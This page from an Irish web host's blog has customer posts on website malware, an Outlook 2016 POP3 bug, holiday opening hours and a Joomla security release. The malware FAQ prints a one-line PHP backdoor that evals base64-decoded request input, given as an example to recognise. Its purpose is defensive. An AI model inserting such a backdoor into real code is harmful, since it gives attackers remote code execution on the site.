MyHost.IE - Internet Services

My site contains malware, what does that mean?

 

malware

Ive just recieved notification of malware on my site, what does it mean?

This essentially means that your websites security has been compromised and malicious files uploaded to your sites folders. Once those files have been uploaded, then they’ve probably been run automatically. This usually results in more files being downloaded to your sites folders and further code injected into your  files. Code would be injected into your site so as to provide further access to the site if the initial vulnerability is detected and secured, known as a ‘backdoor’.

How did this happen?

Websites are now mostly built on Content Management Systems (CMS) like WordPress or Joomla, to name the most popular two. These are programs that provide a framework which you can build a website on. These CMSs use Themes and Plugins to further customise the site to get the look and operation you want. As the code on these matures, more and more vulnerabilities are discovered. These vulnerabilities are then exploited to upload or inject code into your site so they can access your site.

Why do they do this?

There are many reasons, but mostly, it allows access to a server for free. This allows them to use the server to send spam mail, use the server to participate in a DDoS attack, attempt to hack another server etc etc. This is now quite a large illegal industry.

What should I do to prevent this from happening?

Keep your sites code (Core, Themes, plugins) up to date, this ensures that at least older vulnerabilities are patched and secured. If you are not the sites developer then put a service contract in place to manage updates for your site with your developer.

If your site is important to your business then use a proxy firewall, we recommend using CloudProxy http://www.myhost.ie/hosting/website-firewall/ This routes all traffic to your site via their servers where they can filter out malicious requests etc, it also secures your site against outdated code as it virtually patches your sites code so it seems up to date to any would be attacker.

What to do if my site is hacked?

Always have a backup of your site. We cannot stress this enough. We do backup our servers on a 7 day rolling backup system, however your site may have been compromised for some time before it was noticed which renders our backups useless to you. We do offer a backup service for clients who wish to maintain backups over a longer time period, please contact sales@myhost.ie regarding this.

If you don’t have access to a known clean backup of your site we would recommend using the Malware Removal Service described here: http://www.myhost.ie/hosting/malware-removal/

This is a year long product that scans all your files and database and removes any malware code that was injected to them.  A scan is run daily on your site and any malware detection’s are reported to us and cleaned. You would be notified once the site is cleaned with the list of infected files and recommended steps to secure the site. We would limit access to your site so that no further malware can be uploaded. Once they have cleaned your site, we can give access to you or your developer to update and secure the site before releasing it to the public.

If your site has been compromised and you do not have a known clean backup, then we would recommend the Malware Removal Service. Updating a site that has already been compromised, without taking appropriate steps, is a waste of time and effort and usually results in the site being hacked again via a backdoor left on the site from the initial compromise.

Why was my site disabled?

This is not a step we take lightly, however if your site is on shared hosting and is compromised then we have no option but to protect the servers reputation and in turn the reputation of our other clients websites. On a shared server you are sharing the IP address with the other sites on that server. If that IP address gets blacklisted then all the clients websites on that IP address are also blacklisted. Disabling access to a site does two things, it prevents the malware uploaded to your site from being used to carry out further attacks or send spam, which would result in the servers IP address being blacklisted, and it also prevents your site from being further compromised.

What does malware look like?

An example of a backdoor:

$_REQUEST[e] ? eval( base64_decode( $_REQUEST[e] ) ) : exit;

This single line of code is found in file added to the sites code by hackers, frequently disguised as part of a plugin or a theme. When the file is requested they can execute any php code contained in the variable ‘e’ on the site. So if you have a site that has a few hundred php files, you can imagine trying to find that one line. This is why we recomend using http://www.myhost.ie/hosting/malware-removal/

 

To avoid the expense and pain of having to deal with malware on your site, keep it up to date (core, themes and plugins etc) and keep a known clean backup of your site. If you want us to look after your backups for you then contact sales@myhost.ie and we can proivide you with a few solutions.

 

Outlook 2016 deleting mail after download

365

Click on image to see original post from MS.

 

If you have the most recent Office 365 update installed (version 16.0.6568.2025), your emails may get deleted from the server or you may receive duplicate emails in your inbox.

The Outlook team is aware of the problem and actively investigating the issues. We’ll update this post and KB 3145116 as more information becomes available.

For now, please try workaround steps provided in this article (KB 3145116):

  • Configuring your email account to use IMAP settings instead of POP3 (only if your email provider supports this).
    OR
  • Reverting to an earlier version of Office 2016 via uninstall of latest update.

IMPORTANT If you disabled the “Remove from server after <x> days” option in Outlook 2016 to fix the delete email issue you’re probably now getting duplicate emails in your inbox. To avoid both problems, please re-enable the “Remove from server” option and use one of the other workarounds listed in the KB article.

UPDATE 4/3/2016: From Microsoft,  “We have a fix for both POP3 bugs: duplicate emails and server-side mail deletion. The fix should roll out in the next couple of days, and once it’s available, we’ll let you know.

UPDATE 08/3/2016: From Microsoft, “We are in the process of rolling out an Office update now (version 16.0.6568.2036), which will fix the POP3 bugs”

Christmas Opening Hours 2015

Our Christmas opening hours are detailed below. During the holidays our helpdesk will still be open 24×7
We would like to take this opportunity to wish all our customers a Happy Christmas and New Year !

Wednesday 23rd 9:00 – 13:00
Thursday 24th Closed
Friday 25th Closed

Monday 28th Closed
Tuesday 29th Open 9:00 – 13:00
Wednesday 30th Open 9:00 – 13:00
Thursday 31st Open 9:00 – 13:00
Friday 1st Closed

Please note that the deadline for completing new .IE applications is Tuesday 22nd December.

The IEDR who are the official .ie registrar will be closed from Wednesday December 23rd 2015 until Monday January 4th 2016.
Customers can still place orders for new registrations however during this period we will be unable to complete any .ie domain name registrations and modifications.

Joomla Security update

JoomlaSecurity Notice Joomla 3.4.6 Security Release

 

 

On December 14, the Joomla project released version 3.4.6. This fixes a highly critical security vulnerability that affects Joomla 1.5 through 3.4.5. This vulnerability can be exploited by attackers to remotely execute code.

If you are using the old (unsupported) versions 1.5.x and 2.5.x, you have to apply the hotfixes from here. This article from OSTraining explains how to apply them.

This critical vulnerability can be exploited to extract a browser cookie which can be used to provide the attacker with administrator privileges. If that cookie is loaded into the browser, the hacker can gain access to the back end of the website and can access the administrator control panel. The code required to exploit the vulnerability has already been posted online.

Once access has been gained, files can be downloaded including confidential customer information. Since Joomla is used to create e-commerce websites, customers who have previously purchased products through Joomla websites could have their confidential information stolen.

It is therefore imperative that all administrators of Joomla sites update their website software immediately and patch the critical Joomla vulnerability in order to secure their sites.

We do offer customers a malware cleanup service; Sucuri Malware Cleanup and Blacklist Removal; http://www.myhost.ie/hosting/malware-removal/

We also offer a website firewall service which actively prevents these sorts of attack; http://www.myhost.ie/hosting/website-firewall/

This will actively protect your website by monitoring website traffic and dropping malicious connections. It also prevents attacks on vulnerable outdated sites,
using ‘Virtual Website Patching’, which means the site appears fully up to date to any malicious connections.

Great Scott!!

bttf

Next Page »